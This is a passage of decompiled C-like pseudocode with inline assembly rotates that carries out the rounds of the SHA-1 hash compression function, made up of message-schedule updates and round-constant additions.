				_t1678 = _t1675 + _t1715 + ((_t1473 ^ _t1103) & _t1819 ^ _t1473) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1477 =  *(_t1849 + 0x38) ^  *(_t1849 + 0x4c) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x1c);
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *( *(_t1849 + 0x68)) = _t1477;
				_t1481 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x50) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x18);
				_t1106 = (_t1103 ^ (_t1103 ^ _t1819) & _t1715) + _t1678 + _t1477 +  *(_t1849 + 0x58) + 0x5a827999;
				asm("rol edx, 1");
				asm("ror esi, 0x2");
				asm("rol ecx, 0x5");
				( *(_t1849 + 0x68))[1] = _t1481;
				_t1485 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x38) ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x20);
				 *(_t1849 + 0x34) = _t1819;
				asm("rol edx, 1");
				_t1822 = (_t1819 ^ (_t1819 ^ _t1715) & _t1678) + _t1106 + _t1481 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x2");
				( *(_t1849 + 0x68))[2] = _t1485;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1488 = _t1485 + _t1822 + ((_t1678 ^ _t1715) & _t1106 ^ _t1715) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1225 =  *(_t1849 + 0x68);
				_t795 =  *(_t1849 + 0x14) ^  *_t1225 ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x3c);
				asm("rol eax, 1");
				_t1225[3] = _t795;
				 *(_t1849 + 0x14) = _t795;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1229 =  *(_t1849 + 0x68);
				_t1716 = _t1715 + ((_t1678 ^ _t1106) & _t1822 ^ _t1678) + _t1488 + 0x5a827999 +  *(_t1849 + 0x14);
				_t804 =  *(_t1849 + 0x10) ^ _t1229[1] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x40);
				asm("rol eax, 1");
				_t1229[4] = _t804;
				 *(_t1849 + 0x10) = _t804;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1679 = _t1678 + (_t1106 ^ _t1822 ^ _t1488) + _t1716 + 0x6ed9eba1 +  *(_t1849 + 0x10);
				 *(_t1849 + 0x38) = _t1488;
				_t809 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1492 = _t809[2] ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x44) ^  *(_t1849 + 0x3c);
				asm("rol edx, 1");
				_t809[5] = _t1492;
				asm("ror esi, 0x2");
				_t1235 =  *(_t1849 + 0x68);
				_t1107 = _t1106 + (_t1822 ^  *(_t1849 + 0x38) ^ _t1716) + _t1679 + _t1492 + 0x6ed9eba1;
				_t814 = _t1235[3];
				_t1497 = _t814 ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x1c) ^  *(_t1849 + 0x40);
				asm("rol edx, 1");
				_t1235[6] = _t1497;
				 *(_t1849 + 0x14) = _t814;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1238 =  *(_t1849 + 0x68);
				_t1823 = _t1822 + (_t1679 ^  *(_t1849 + 0x38) ^ _t1716) + _t1107 + _t1497 + 0x6ed9eba1;
				_t819 = _t1238[4];
				_t1502 = _t819 ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x18) ^  *(_t1849 + 0x44);
				asm("rol edx, 1");
				 *(_t1849 + 0x10) = _t819;
				_t1238[7] = _t1502;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1243 =  *(_t1849 + 0x38) + 0x6ed9eba1 + (_t1679 ^ _t1107 ^ _t1716) + _t1823 + _t1502;
				_t824 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1243;
				asm("rol ecx, 0x5");
				_t1506 =  *_t824 ^  *(_t1849 + 0x20) ^  *(_t1849 + 0x1c) ^ _t824[5];
				asm("rol edx, 1");
				_t824[8] = _t1506;
				asm("ror ebp, 0x2");
				_t828 =  *(_t1849 + 0x68);
				_t1246 = _t1243 + _t1506 + (_t1679 ^ _t1107 ^ _t1823) + _t1716 + 0x6ed9eba1;
				_t1718 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1246;
				asm("rol ecx, 0x5");
				_t1510 = _t828[1] ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x18) ^ _t828[6];
				asm("rol edx, 1");
				_t828[9] = _t1510;
				asm("ror esi, 0x2");
				_t832 =  *(_t1849 + 0x68);
				_t1249 = _t1246 + _t1510 + (_t1107 ^ _t1823 ^ _t1718) + _t1679 + 0x6ed9eba1;
				_t1681 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1249;
				asm("rol ecx, 0x5");
				_t1514 = _t832[2] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x20) ^ _t832[7];
				asm("rol edx, 1");
				_t832[0xa] = _t1514;
				asm("ror edi, 0x2");
				_t836 =  *(_t1849 + 0x68);
				_t1252 = _t1249 + _t1514 + (_t1823 ^ _t1718 ^ _t1681) + _t1107 + 0x6ed9eba1;
				_t1109 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1252;
				asm("rol ecx, 0x5");
				_t1518 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x48) ^ _t836[8];
				asm("rol edx, 1");
				_t836[0xb] = _t1518;
				asm("ror ebx, 0x2");
				_t172 = _t1823 + 0x6ed9eba1; // 0x14577208
				_t1255 = _t172 + (_t1109 ^ _t1718 ^ _t1681) + _t1252 + _t1518;
				_t841 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1255;
				_t1522 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x24) ^ _t841[9];
				_t1824 =  *(_t1849 + 0x54);
				asm("rol edx, 1");
				_t841[0xc] = _t1522;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t845 =  *(_t1849 + 0x68);
				_t1258 = _t1255 + _t1522 + (_t1109 ^ _t1824 ^ _t1681) + _t1718 + 0x6ed9eba1;
				_t1720 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1258;
				asm("rol ecx, 0x5");
				_t1526 =  *(_t1849 + 0x30) ^  *(_t1849 + 0x28) ^ _t845[0xa] ^ _t845[5];
				asm("rol edx, 1");
				_t845[0xd] = _t1526;
				asm("ror esi, 0x2");
				_t849 =  *(_t1849 + 0x68);
				_t1261 = _t1258 + _t1526 + (_t1109 ^ _t1824 ^ _t1720) + _t1681 + 0x6ed9eba1;
				_t1683 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1261;
				asm("rol ecx, 0x5");
				_t1530 =  *_t849 ^  *(_t1849 + 0x2c) ^ _t849[0xb] ^ _t849[6];
				asm("rol edx, 1");
				_t849[0xe] = _t1530;
				asm("ror edi, 0x2");
				_t853 =  *(_t1849 + 0x68);
				_t1264 = _t1261 + _t1530 + (_t1824 ^ _t1720 ^ _t1683) + _t1109 + 0x6ed9eba1;
				_t1111 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1264;
				asm("rol ecx, 0x5");
				_t1534 = _t853[1] ^  *(_t1849 + 0x30) ^ _t853[0xc] ^ _t853[7];
				asm("rol edx, 1");
				_t853[0xf] = _t1534;
				asm("ror ebx, 0x2");
				_t1825 =  *(_t1849 + 0x54);
				_t1267 = _t1824 + 0x6ed9eba1 + (_t1720 ^ _t1683 ^ _t1111) + _t1264 + _t1534;
				_t858 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1267;
				asm("rol ecx, 0x5");
				_t1538 = _t858[2] ^  *_t858 ^ _t858[0xd] ^ _t858[8];
				asm("rol edx, 1");
				 *_t858 = _t1538;
				_t862 =  *(_t1849 + 0x68);
				_t1270 = _t1267 + _t1538 + (_t1825 ^ _t1683 ^ _t1111) + _t1720 + 0x6ed9eba1;
				_t1722 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1270;
				_t1542 =  *(_t1849 + 0x14) ^ _t862[1] ^ _t862[0xe] ^ _t862[9];
				asm("rol edx, 1");
				_t862[1] = _t1542;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				asm("ror esi, 0x2");
				_t866 =  *(_t1849 + 0x68);
				_t1273 = _t1270 + _t1542 + (_t1825 ^ _t1722 ^ _t1111) + _t1683 + 0x6ed9eba1;
				_t1685 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1273;
				asm("rol ecx, 0x5");
				_t1546 =  *(_t1849 + 0x10) ^ _t866[2] ^ _t866[0xf] ^ _t866[0xa];
				asm("rol edx, 1");
				_t866[2] = _t1546;
				_t1274 =  *(_t1849 + 0x68);
				asm("ror edi, 0x2");
				_t1549 = _t1273 + _t1546 + (_t1825 ^ _t1722 ^ _t1685) + _t1111 + 0x6ed9eba1;
				_t873 =  *(_t1849 + 0x14) ^  *_t1274 ^ _t1274[0xb] ^ _t1274[5];
				_t1113 =  *(_t1849 + 0x58);
				asm("rol eax, 1");
				_t1274[3] = _t873;
				 *(_t1849 + 0x14) = _t873;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1277 =  *(_t1849 + 0x68);
				_t1827 = _t1825 + 0x6ed9eba1 + (_t1722 ^ _t1685 ^ _t1113) + _t1549 +  *(_t1849 + 0x14);
				_t881 =  *(_t1849 + 0x10) ^ _t1277[1] ^ _t1277[0xc] ^ _t1277[6];
				asm("rol eax, 1");
				_t1277[4] = _t881;
				 *(_t1849 + 0x10) = _t881;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t885 =  *(_t1849 + 0x68);
				_t1281 = _t1827 +  *(_t1849 + 0x10) + (_t1685 ^ _t1113 ^ _t1549) + _t1722 + 0x6ed9eba1;
				 *(_t1849 + 0x58) = _t1549;
				 *(_t1849 + 0x54) = _t1281;
				_t1553 = _t885[2] ^ _t885[0xd] ^ _t885[7] ^ _t885[5];
				_t1724 =  *(_t1849 + 0x58);
				asm("rol edx, 1");
				_t885[5] = _t1553;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1284 = _t1281 + _t1553 + (_t1827 ^ _t1113 ^ _t1724) + _t1685 + 0x6ed9eba1;
				_t1687 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1284;
				asm("rol ecx, 0x5");
				_t889 = _t1687[3];
				_t1557 = _t889 ^ _t1687[0xe] ^ _t1687[8] ^ _t1687[6];
				 *(_t1849 + 0x14) = _t889;
				asm("rol edx, 1");
				_t1687[6] = _t1557;
				_t1688 =  *(_t1849 + 0x54);
				asm("ror edi, 0x2");
				_t894 = (_t1827 ^ _t1688 ^ _t1724) + _t1284 + _t1557 + _t1113 + 0x6ed9eba1;
				_t1115 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t894;
				_t1286 = _t1115[4];
				_t1561 = _t1286 ^ _t1115[0xf] ^ _t1115[9] ^ _t1115[7];
				 *(_t1849 + 0x3c) = _t1286;
				asm("rol ecx, 0x5");
				asm("rol edx, 1");
				_t1115[7] = _t1561;
				_t1116 =  *(_t1849 + 0x58);
				asm("ror ebx, 0x2");
				_t1289 =  *(_t1849 + 0x68);
				_t899 = (_t1827 ^ _t1688 ^ _t1116) + _t894 + _t1561 + _t1724 + 0x6ed9eba1;
				 *(_t1849 + 0x44) = _t899;
				asm("rol edx, 0x5");
				_t1729 =  *_t1289 ^ _t1289[0xa] ^ _t1289[8] ^ _t1289[5];
				asm("rol esi, 1");
				_t1289[8] = _t1729;
				_t1828 =  *(_t1849 + 0x48);
				_t903 = _t899 - 0x70e44324 + ((_t1116 |  *(_t1849 + 0x48)) & _t1688 | _t1116 &  *(_t1849 + 0x48)) + _t1729 + _t1827;
				asm("ror ebp, 0x2");
				_t1296 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t903;
				_t1733 = _t1296[1] ^ _t1296[0xb] ^ _t1296[9] ^ _t1296[6];
				asm("rol esi, 1");
				_t1296[9] = _t1733;
				asm("rol edx, 0x5");
				_t1689 =  *(_t1849 + 0x44);
				asm("ror edi, 0x2");
				_t907 = _t903 - 0x70e44324 + ((_t1828 |  *(_t1849 + 0x44)) & _t1116 | _t1828 &  *(_t1849 + 0x44)) + _t1733 + _t1688;
				_t1303 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t907;
				asm("rol edx, 0x5");
				_t1737 = _t1303[2] ^ _t1303[0xc] ^ _t1303[0xa] ^ _t1303[7];
				asm("rol esi, 1");
				_t1303[0xa] = _t1737;
				_t1117 =  *(_t1849 + 0x50);
				_t911 = _t907 - 0x70e44324 + (( *(_t1849 + 0x50) | _t1689) & _t1828 |  *(_t1849 + 0x50) & _t1689) + _t1737 + _t1116;
				asm("ror ebx, 0x2");
				_t1310 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x44) = _t911;
				asm("rol edx, 0x5");
				_t1741 =  *(_t1849 + 0x14) ^ _t1310[0xd] ^ _t1310[0xb] ^ _t1310[8];
				asm("rol esi, 1");
				_t1310[0xb] = _t1741;
				_t1829 =  *(_t1849 + 0x48);
				_t915 = _t911 - 0x70e44324 + ((_t1117 |  *(_t1849 + 0x48)) & _t1689 | _t1117 &  *(_t1849 + 0x48)) + _t1741 + _t1828;
				asm("ror ebp, 0x2");
				_t1317 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x40) = _t915;
				asm("rol edx, 0x5");
				_t1745 =  *(_t1849 + 0x3c) ^ _t1317[0xe] ^ _t1317[0xc] ^ _t1317[9];
				asm("rol esi, 1");
				_t1317[0xc] = _t1745;
				_t919 = _t915 - 0x70e44324 + ((_t1829 |  *(_t1849 + 0x44)) & _t1117 | _t1829 &  *(_t1849 + 0x44)) + _t1745 + _t1689;
				_t1690 =  *(_t1849 + 0x44);
				_t1324 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t919;
				asm("ror edi, 0x2");
				asm("rol edx, 0x5");
				_t1749 = _t1324[0xf] ^ _t1324[0xd] ^ _t1324[0xa] ^ _t1324[5];
				asm("rol esi, 1");
				_t1324[0xd] = _t1749;
				_t1118 =  *(_t1849 + 0x40);
				_t923 = _t919 - 0x70e44324 + ((_t1690 |  *(_t1849 + 0x40)) & _t1829 | _t1690 &  *(_t1849 + 0x40)) + _t1749 + _t1117;
				asm("ror ebx, 0x2");
				_t1331 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t923;
				asm("rol edx, 0x5");
				_t1753 =  *_t1331 ^ _t1331[0xe] ^ _t1331[0xb] ^ _t1331[6];
				asm("rol esi, 1");
				_t1331[0xe] = _t1753;
				_t1830 =  *(_t1849 + 0x48);
				_t927 = _t923 - 0x70e44324 + ((_t1118 |  *(_t1849 + 0x48)) & _t1690 | _t1118 &  *(_t1849 + 0x48)) + _t1753 + _t1829;
				asm("ror ebp, 0x2");
				_t1338 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x44) = _t927;
				asm("rol edx, 0x5");
				_t1757 = _t1338[1] ^ _t1338[0xf] ^ _t1338[0xc] ^ _t1338[7];
				asm("rol esi, 1");
				_t1338[0xf] = _t1757;
				_t1691 =  *(_t1849 + 0x50);
				_t931 = _t927 - 0x70e44324 + (( *(_t1849 + 0x50) | _t1830) & _t1118 |  *(_t1849 + 0x50) & _t1830) + _t1757 + _t1690;
				asm("ror edi, 0x2");
				_t1345 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				 *(_t1849 + 0x48) = _t931;
				_t1761 = _t1345[2] ^  *_t1345 ^ _t1345[0xd] ^ _t1345[8];
				asm("rol esi, 1");
				 *_t1345 = _t1761;
				_t1119 =  *(_t1849 + 0x44);
				_t935 = _t931 - 0x70e44324 + ((_t1691 |  *(_t1849 + 0x44)) & _t1830 | _t1691 &  *(_t1849 + 0x44)) + _t1761 + _t1118;
				asm("ror ebx, 0x2");
				_t1352 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x40) = _t935;
				asm("rol edx, 0x5");
				_t1765 =  *(_t1849 + 0x14) ^ _t1352[1] ^ _t1352[0xe] ^ _t1352[9];
				asm("rol esi, 1");
				_t1352[1] = _t1765;
				_t1831 =  *(_t1849 + 0x48);
				_t939 = _t935 - 0x70e44324 + ((_t1119 |  *(_t1849 + 0x48)) & _t1691 | _t1119 &  *(_t1849 + 0x48)) + _t1765 + _t1830;
				asm("ror ebp, 0x2");
				_t1359 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t939;
				asm("rol edx, 0x5");
				_t1769 =  *(_t1849 + 0x3c) ^ _t1359[2] ^ _t1359[0xf] ^ _t1359[0xa];
				asm("rol esi, 1");
				_t1359[2] = _t1769;
				_t1573 =  *(_t1849 + 0x68);
				_t1692 =  *(_t1849 + 0x40);
				_t943 = _t939 - 0x70e44324 + ((_t1831 |  *(_t1849 + 0x40)) & _t1119 | _t1831 &  *(_t1849 + 0x40)) + _t1769 + _t1691;
				_t1369 =  *(_t1849 + 0x14) ^  *_t1573 ^ _t1573[0xb] ^ _t1573[5];
				asm("rol ecx, 1");
				_t1573[3] = _t1369;
				 *(_t1849 + 0x14) = _t1369;
				asm("ror edi, 0x2");
				 *(_t1849 + 0x4c) = _t943;
				asm("rol edx, 0x5");
				_t1120 =  *(_t1849 + 0x50);
				asm("ror ebx, 0x2");
				_t947 = _t943 - 0x70e44324 + ((_t1692 |  *(_t1849 + 0x50)) & _t1831 | _t1692 &  *(_t1849 + 0x50)) +  *(_t1849 + 0x14) + _t1119;
				_t1376 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t947;
				_t1773 =  *(_t1849 + 0x3c) ^ _t1376[1] ^ _t1376[0xc] ^ _t1376[6];
				asm("rol esi, 1");
				_t1376[4] = _t1773;
				asm("rol edx, 0x5");
				_t1380 =  *(_t1849 + 0x68);
				_t1833 =  *(_t1849 + 0x4c);
				_t953 = ( *(_t1849 + 0x4c) & _t1120 | ( *(_t1849 + 0x4c) | _t1120) & _t1692) + _t1773 + _t1831 + 0x8f1bbcdc + _t947;
				asm("ror ebp, 0x2");
				_t1777 = _t1380[2] ^ _t1380[0xd] ^ _t1380[7] ^ _t1380[5];
				asm("rol esi, 1");
				_t1380[5] = _t1777;
				 *(_t1849 + 0x44) = _t953;
				asm("rol edx, 0x5");
				_t1577 =  *(_t1849 + 0x68);
				_t957 = _t953 - 0x70e44324 + ((_t1833 |  *(_t1849 + 0x48)) & _t1120 | _t1833 &  *(_t1849 + 0x48)) + _t1777 + _t1692;
				_t1693 =  *(_t1849 + 0x48);
				 *(_t1849 + 0x14) = _t957;
				asm("ror edi, 0x2");
				_t1387 = _t1577[3];
				_t1781 = _t1387 ^ _t1577[0xe] ^ _t1577[8] ^ _t1577[6];
				 *(_t1849 + 0x18) = _t1387;
				asm("rol esi, 1");
				_t1577[6] = _t1781;
				asm("rol edx, 0x5");
				_t1579 =  *(_t1849 + 0x68);
				_t961 = _t957 - 0x70e44324 + ((_t1693 |  *(_t1849 + 0x44)) & _t1833 | _t1693 &  *(_t1849 + 0x44)) + _t1781 + _t1120;
				_t1121 =  *(_t1849 + 0x44);
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x10) = _t961;
				_t1394 = _t1579[4];
				_t1785 = _t1394 ^ _t1579[0xf] ^ _t1579[9] ^ _t1579[7];
				 *(_t1849 + 0x1c) = _t1394;
				asm("rol esi, 1");
				_t1579[7] = _t1785;
				asm("rol edx, 0x5");
				_t964 =  *(_t1849 + 0x14);
				asm("ror eax, 0x2");
				 *(_t1849 + 0x14) = _t964;
				_t1835 = _t961 - 0x70e44324 + ((_t1121 |  *(_t1849 + 0x14)) & _t1693 | _t1121 &  *(_t1849 + 0x14)) + _t1785 + _t1833;
				_t1401 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				_t1789 =  *_t1401 ^ _t1401[0xa] ^ _t1401[8] ^ _t1401[5];
				asm("rol esi, 1");
				_t1401[8] = _t1789;
				_t966 =  *(_t1849 + 0x10);
				asm("ror eax, 0x2");
				 *(_t1849 + 0x10) = _t966;
				_t1695 = _t1835 - 0x70e44324 + ((_t964 |  *(_t1849 + 0x10)) & _t1121 | _t964 &  *(_t1849 + 0x10)) + _t1789 + _t1693;
				_t1408 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				_t1793 = _t1408[1] ^ _t1408[0xb] ^ _t1408[9] ^ _t1408[6];
				asm("rol esi, 1");
				_t1408[9] = _t1793;
				asm("ror ebp, 0x2");
				_t969 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t1835;
				_t1123 = _t1695 - 0x70e44324 + ((_t1835 | _t966) &  *(_t1849 + 0x14) | _t1835 &  *(_t1849 + 0x10)) + _t1793 + _t1121;
				_t1797 = _t969[2] ^ _t969[0xc] ^ _t969[0xa] ^ _t969[7];
				asm("rol esi, 1");
				_t969[0xa] = _t1797;
				_t1801 =  *(_t1849 + 0x18) ^ _t969[0xd] ^ _t969[0xb] ^ _t969[8];
				asm("rol edx, 0x5");
				asm("ror edi, 0x2");
				asm("rol esi, 1");
				 *(_t1849 + 0x58) = _t1695;
				_t969[0xb] = _t1801;
				_t1838 = _t1123 - 0x70e44324 + ((_t1835 | _t1695) &  *(_t1849 + 0x10) | _t1835 & _t1695) + _t1797 +  *(_t1849 + 0x14);
				asm("rol edx, 0x5");
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1123;
				_t972 =  *(_t1849 + 0x68);
				_t1803 = _t1838 - 0x70e44324 + ((_t1695 | _t1123) &  *(_t1849 + 0x50) | _t1695 & _t1123) + _t1801 +  *(_t1849 + 0x10);
				_t1588 =  *(_t1849 + 0x1c) ^ _t972[0xe] ^ _t972[0xc] ^ _t972[9];
				asm("rol edx, 1");
				_t972[0xc] = _t1588;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x50) = _t1838;
				_t1428 =  *(_t1849 + 0x68);
				_t1697 = _t1803 - 0x359d3e2a + (_t1695 ^ _t1123 ^ _t1838) + _t1588 +  *(_t1849 + 0x50);
				_t978 = _t1428[0xa];
				_t1592 = _t1428[0xf] ^ _t1428[0xd] ^ _t978 ^ _t1428[5];
				asm("rol edx, 1");
				_t1428[0xd] = _t1592;
				 *(_t1849 + 0x44) = _t978;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1430 =  *(_t1849 + 0x68);
				_t1125 = _t1697 - 0x359d3e2a + (_t1123 ^ _t1838 ^ _t1803) + _t1592 +  *(_t1849 + 0x58);
				_t984 = _t1430[0xb];
				_t1596 =  *_t1430 ^ _t1430[0xe] ^ _t984 ^ _t1430[6];
				asm("rol edx, 1");
				_t1430[0xe] = _t1596;
				 *(_t1849 + 0x40) = _t984;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1432 =  *(_t1849 + 0x68);
				_t1840 = _t1125 - 0x359d3e2a + (_t1697 ^ _t1838 ^ _t1803) + _t1596 +  *(_t1849 + 0x54);
				_t990 = _t1432[0xc];
				_t1600 = _t1432[1] ^ _t1432[0xf] ^ _t990 ^ _t1432[7];
				 *(_t1849 + 0x4c) = _t990;
				asm("rol edx, 1");
				_t1432[0xf] = _t1600;
				asm("rol ecx, 0x5");
				_t1602 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t1840 + (_t1697 ^ _t1125 ^ _t1803) + _t1600 + 0xca62c1d6 +  *(_t1849 + 0x50);
				_t1435 =  *(_t1849 + 0x68);
				asm("ror ebx, 0x2");
				_t996 = _t1602[0xd];
				 *(_t1849 + 0x48) = _t996;
				_t997 = _t1435;
				asm("rol ecx, 0x5");
				_t1606 = _t1602[2] ^  *_t1435 ^ _t996 ^ _t997[8];
				asm("rol edx, 1");
				 *_t997 = _t1606;
				asm("ror ebp, 0x2");
				_t1804 =  *(_t1849 + 0x50);
				_t1438 =  *(_t1849 + 0x50) + 0xca62c1d6 + (_t1697 ^ _t1125 ^ _t1840) + _t1606 + _t1803;
				_t1003 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1438;
				asm("rol ecx, 0x5");
				_t1610 =  *(_t1849 + 0x18) ^ _t1003[1] ^ _t1003[0xe] ^ _t1003[9];
				asm("rol edx, 1");
				_t1003[1] = _t1610;
				asm("ror esi, 0x2");
				_t1699 =  *(_t1849 + 0x58);
				_t1439 = _t1438 + (_t1125 ^ _t1840 ^ _t1804) + _t1610 + _t1697 + 0xca62c1d6;
				_t1009 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x54) = _t1439;
				asm("rol ecx, 0x5");
				_t1614 =  *(_t1849 + 0x1c) ^ _t1009[2] ^ _t1009[0xf] ^ _t1009[0xa];
				asm("rol edx, 1");
				_t1009[2] = _t1614;
				asm("ror edi, 0x2");
				_t1440 =  *(_t1849 + 0x68);
				_t1126 =  *(_t1849 + 0x54);
				_t1616 = _t1439 - 0x359d3e2a + (_t1840 ^ _t1804 ^ _t1699) + _t1614 + _t1125;
				_t1018 =  *(_t1849 + 0x18) ^  *_t1440 ^ _t1440[0xb] ^ _t1440[5];
				asm("rol eax, 1");
				_t1440[3] = _t1018;
				 *(_t1849 + 0x18) = _t1018;
				asm("rol ecx, 0x5");
				_t1842 = _t1616 - 0x359d3e2a + (_t1126 ^ _t1804 ^ _t1699) +  *(_t1849 + 0x18) + _t1840;
				asm("ror ebx, 0x2");
				_t1025 = ( *(_t1849 + 0x68))[1];
				 *(_t1849 + 0x2c) = _t1025;
				_t1026 =  *(_t1849 + 0x68);
				_t1445 =  *(_t1849 + 0x1c) ^ _t1025 ^ _t1026[0xc] ^ _t1026[6];
				asm("rol ecx, 1");
				_t1026[4] = _t1445;
				 *(_t1849 + 0x1c) = _t1445;
				asm("ror edx, 0x2");
				 *(_t1849 + 0x58) = _t1616;
				_t1805 =  *(_t1849 + 0x58);
				asm("rol ecx, 0x5");
				_t1032 = (_t1126 ^ _t1616 ^ _t1699) +  *(_t1849 + 0x1c) + _t1804 + _t1842 + 0xca62c1d6;
				_t1448 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x30) = _t1032;
				_t1620 = _t1448[2] ^ _t1448[0xd] ^ _t1448[7] ^ _t1448[5];
				asm("rol edx, 1");
				_t1448[5] = _t1620;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x58) = _t1842;
				_t1700 =  *(_t1849 + 0x68);
				_t1038 = (_t1126 ^ _t1805 ^ _t1842) + _t1620 + _t1699 + _t1032 + 0xca62c1d6;
				 *(_t1849 + 0x14) = _t1038;
				asm("rol ecx, 0x5");
				_t1624 = _t1700[3] ^ _t1700[0xe] ^ _t1700[8] ^ _t1700[6];
				asm("rol edx, 1");
				_t1700[6] = _t1624;
				_t1844 = _t1038 - 0x359d3e2a + (_t1805 ^ _t1842 ^  *(_t1849 + 0x30)) + _t1624 + _t1126;
				_t1044 = _t1700;
				_t1127 =  *(_t1849 + 0x30);
				_t1628 = _t1700[4] ^ _t1700[0xf] ^ _t1700[9] ^ _t1700[7];
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x30) = _t1127;
				asm("ror dword [esp+0x14], 0x2");
				asm("rol edx, 1");
				_t1700[7] = _t1628;
				asm("rol ecx, 0x5");
				_t1132 = (_t1127 ^  *(_t1849 + 0x58) ^  *(_t1849 + 0x14)) + _t1628 + _t1805 + 0xca62c1d6 + _t1844;
				_t1632 =  *_t1044 ^ _t1044[0xa] ^ _t1044[8] ^ _t1044[5];
				asm("rol edx, 1");
				_t1044[8] = _t1632;
				asm("rol edi, 0x5");
				_t1702 = _t1132 + (_t1844 ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x14)) + _t1632 + 0xca62c1d6 +  *(_t1849 + 0x58);
				_t1050 =  *(_t1849 + 0x68);
				asm("ror ebp, 0x2");
				asm("rol esi, 0x5");
				 *(_t1849 + 0x58) = _t1844;
				_t1637 =  *(_t1849 + 0x2c) ^ _t1050[0xb] ^ _t1050[9] ^ _t1050[6];
				asm("rol edx, 1");
				_t1050[9] = _t1637;
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1132;
				_t1808 = _t1702 + (_t1844 ^ _t1132 ^  *(_t1849 + 0x14)) + _t1637 + 0xca62c1d6 +  *(_t1849 + 0x30);
				_t1056 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1642 = _t1056[2] ^  *(_t1849 + 0x4c) ^  *(_t1849 + 0x44) ^ _t1056[7];
				asm("rol edx, 1");
				_t1056[0xa] = _t1642;
				asm("ror edi, 0x2");
				 *(_t1849 + 0x50) = _t1702;
				_t1846 = _t1808 - 0x359d3e2a + (_t1844 ^ _t1132 ^ _t1702) + _t1642 +  *(_t1849 + 0x14);
				_t1062 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1646 = _t1062[3] ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x40) ^ _t1062[8];
				asm("rol edx, 1");
				_t1062[0xb] = _t1646;
				asm("ror esi, 0x2");
				_t1134 = _t1846 - 0x359d3e2a + (_t1132 ^ _t1702 ^ _t1808) + _t1646 +  *(_t1849 + 0x58);
				 *(_t1849 + 0x58) = _t1808;
				_t1068 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1650 = _t1068[9] ^ _t1068[4] ^ _t1068[0xe] ^  *(_t1849 + 0x4c);
				asm("rol edx, 1");
				_t1068[0xc] = _t1650;
				asm("ror ebp, 0x2");
